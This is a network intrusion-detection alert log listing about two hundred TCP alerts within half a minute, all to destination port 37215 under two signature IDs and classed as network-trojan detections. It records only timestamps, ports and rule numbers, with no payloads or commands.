          Timestamp:06/09/24-16:33:37.162567
          SID:2829579
          Source Port:33292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925517
          SID:2829579
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035076
          SID:2835222
          Source Port:53194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288164
          SID:2829579
          Source Port:57238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078687
          SID:2835222
          Source Port:60666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473617
          SID:2835222
          Source Port:42438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419021
          SID:2835222
          Source Port:59182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.681968
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923542
          SID:2835222
          Source Port:47870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285924
          SID:2829579
          Source Port:56434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866018
          SID:2829579
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946808
          SID:2829579
          Source Port:44966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245532
          SID:2835222
          Source Port:41698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948460
          SID:2835222
          Source Port:41444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290196
          SID:2835222
          Source Port:48062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161309
          SID:2835222
          Source Port:37808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102267
          SID:2835222
          Source Port:43582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926237
          SID:2835222
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080901
          SID:2829579
          Source Port:37316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658654
          SID:2829579
          Source Port:53446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719593
          SID:2829579
          Source Port:56886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032868
          SID:2835222
          Source Port:41594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537966
          SID:2829579
          Source Port:56350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243878
          SID:2835222
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246160
          SID:2829579
          Source Port:35926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081786
          SID:2829579
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928157
          SID:2835222
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643742
          SID:2829579
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205778
          SID:2835222
          Source Port:45004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719519
          SID:2835222
          Source Port:38478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227352
          SID:2829579
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946473
          SID:2829579
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987107
          SID:2829579
          Source Port:58516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137895
          SID:2835222
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035722
          SID:2829579
          Source Port:40654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208225
          SID:2835222
          Source Port:51678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922109
          SID:2835222
          Source Port:50658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034974
          SID:2829579
          Source Port:51120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895778
          SID:2829579
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285109
          SID:2835222
          Source Port:44564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822275
          SID:2835222
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158236
          SID:2829579
          Source Port:47750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992282
          SID:2829579
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104503
          SID:2835222
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205898
          SID:2835222
          Source Port:40420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565146
          SID:2835222
          Source Port:54014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718335
          SID:2829579
          Source Port:55942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658240
          SID:2829579
          Source Port:57654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988958
          SID:2829579
          Source Port:44540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163858
          SID:2835222
          Source Port:36154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032755
          SID:2835222
          Source Port:58566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413144
          SID:2829579
          Source Port:51566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988749
          SID:2835222
          Source Port:60854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252461
          SID:2835222
          Source Port:37396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287003
          SID:2835222
          Source Port:39582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914339
          SID:2835222
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717919
          SID:2835222
          Source Port:47658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645670
          SID:2835222
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477475
          SID:2829579
          Source Port:35398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540225
          SID:2835222
          Source Port:47706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541561
          SID:2835222
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165782
          SID:2829579
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988496
          SID:2829579
          Source Port:50952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562051
          SID:2835222
          Source Port:39132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952216
          SID:2835222
          Source Port:48918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917035
          SID:2829579
          Source Port:55904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471731
          SID:2835222
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224738
          SID:2829579
          Source Port:41660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008676
          SID:2829579
          Source Port:41854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905150
          SID:2835222
          Source Port:45480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225365
          SID:2835222
          Source Port:51396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230503
          SID:2829579
          Source Port:39854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397007
          SID:2835222
          Source Port:58854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905891
          SID:2829579
          Source Port:47014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253125
          SID:2829579
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206745
          SID:2835222
          Source Port:51738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928309
          SID:2829579
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714385
          SID:2829579
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949918
          SID:2829579
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206469
          SID:2835222
          Source Port:45688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000887
          SID:2829579
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034902
          SID:2829579
          Source Port:51214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226848
          SID:2835222
          Source Port:44670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165990
          SID:2829579
          Source Port:39188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300491
          SID:2829579
          Source Port:47588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272257
          SID:2829579
          Source Port:54238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568042
          SID:2835222
          Source Port:56328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417384
          SID:2835222
          Source Port:49098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676293
          SID:2829579
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565054
          SID:2829579
          Source Port:33466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718620
          SID:2835222
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601719
          SID:2835222
          Source Port:46490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027462
          SID:2829579
          Source Port:60078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285541
          SID:2829579
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477493
          SID:2829579
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414103
          SID:2829579
          Source Port:53938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037794
          SID:2835222
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284594
          SID:2829579
          Source Port:47370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944396
          SID:2829579
          Source Port:48372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566201
          SID:2835222
          Source Port:47366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472287
          SID:2835222
          Source Port:60212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034576
          SID:2829579
          Source Port:56410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028261
          SID:2829579
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.470977
          SID:2835222
          Source Port:44154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036128
          SID:2829579
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033776
          SID:2829579
          Source Port:34096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539212
          SID:2835222
          Source Port:38842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946066
          SID:2835222
          Source Port:48824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162871
          SID:2829579
          Source Port:38056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247384
          SID:2835222
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928366
          SID:2835222
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030449
          SID:2835222
          Source Port:53292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206280
          SID:2835222
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865329
          SID:2835222
          Source Port:52258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163924
          SID:2835222
          Source Port:58788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247182
          SID:2829579
          Source Port:33838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991773
          SID:2829579
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642735
          SID:2835222
          Source Port:52074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397988
          SID:2835222
          Source Port:36456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165201
          SID:2829579
          Source Port:49502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205451
          SID:2829579
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863284
          SID:2835222
          Source Port:36584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287260
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079491
          SID:2829579
          Source Port:58658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287945
          SID:2829579
          Source Port:55634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468699
          SID:2835222
          Source Port:50428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230432
          SID:2835222
          Source Port:53060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717856
          SID:2835222
          Source Port:59140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207985
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412216
          SID:2835222
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600415
          SID:2835222
          Source Port:53390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645069
          SID:2829579
          Source Port:56704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031987
          SID:2829579
          Source Port:36248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418111
          SID:2829579
          Source Port:49150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398563
          SID:2835222
          Source Port:45286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714970
          SID:2835222
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718153
          SID:2835222
          Source Port:52566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267497
          SID:2835222
          Source Port:53518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034070
          SID:2835222
          Source Port:49730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819817
          SID:2835222
          Source Port:32828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719975
          SID:2829579
          Source Port:33758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473477
          SID:2835222
          Source Port:50166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078513
          SID:2835222
          Source Port:45798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918954
          SID:2835222
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227549
          SID:2829579
          Source Port:46556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947232
          SID:2835222
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870592
          SID:2829579
          Source Port:48134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868793
          SID:2829579
          Source Port:39402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037092
          SID:2829579
          Source Port:51940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029394
          SID:2835222
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557667
          SID:2829579
          Source Port:58214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918132
          SID:2835222
          Source Port:42134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931273
          SID:2835222
          Source Port:38962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691788
          SID:2835222
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224719
          SID:2829579
          Source Port:34962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105380
          SID:2835222
          Source Port:34026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227521
          SID:2835222
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414131
          SID:2829579
          Source Port:53352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205252
          SID:2835222
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125701
          SID:2829579
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312404
          SID:2835222
          Source Port:50312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902141
          SID:2829579
          Source Port:55516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.949665
          SID:2835222
          Source Port:44186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253187
          SID:2829579
          Source Port:47080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298984
          SID:2835222
          Source Port:43946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097870
          SID:2835222
          Source Port:55792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288908
          SID:2835222
          Source Port:33386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414368
          SID:2835222
          Source Port:34538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078897
          SID:2835222
          Source Port:37432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030725
          SID:2829579
          Source Port:49224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947729
          SID:2829579
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288293
          SID:2835222
          Source Port:58498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000527
          SID:2829579
          Source Port:46058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289201
          SID:2835222
          Source Port:48344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818511
          SID:2835222
          Source Port:58950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418037
          SID:2835222
          Source Port:34250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712973
          SID:2835222
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558990
          SID:2835222
          Source Port:49524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014822
          SID:2829579
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.889109
          SID:2835222
          Source Port:41164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597233
          SID:2835222
          Source Port:59096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035377
          SID:2835222
          Source Port:36592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282055
          SID:2835222
          Source Port:51584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914950
          SID:2829579
          Source Port:58796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248653
          SID:2835222
          Source Port:59208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645915
          SID:2829579
          Source Port:54512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028969
          SID:2835222
          Source Port:46914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030577
          SID:2829579
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079378
          SID:2829579
          Source Port:33596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289000
          SID:2829579
          Source Port:60880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712984
          SID:2829579
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867040
          SID:2835222
          Source Port:54438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104534
          SID:2829579
          Source Port:43866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642885
          SID:2835222
          Source Port:45424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087714
          SID:2829579
          Source Port:35298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276746
          SID:2829579
          Source Port:35048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645288
          SID:2829579
          Source Port:56082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720465
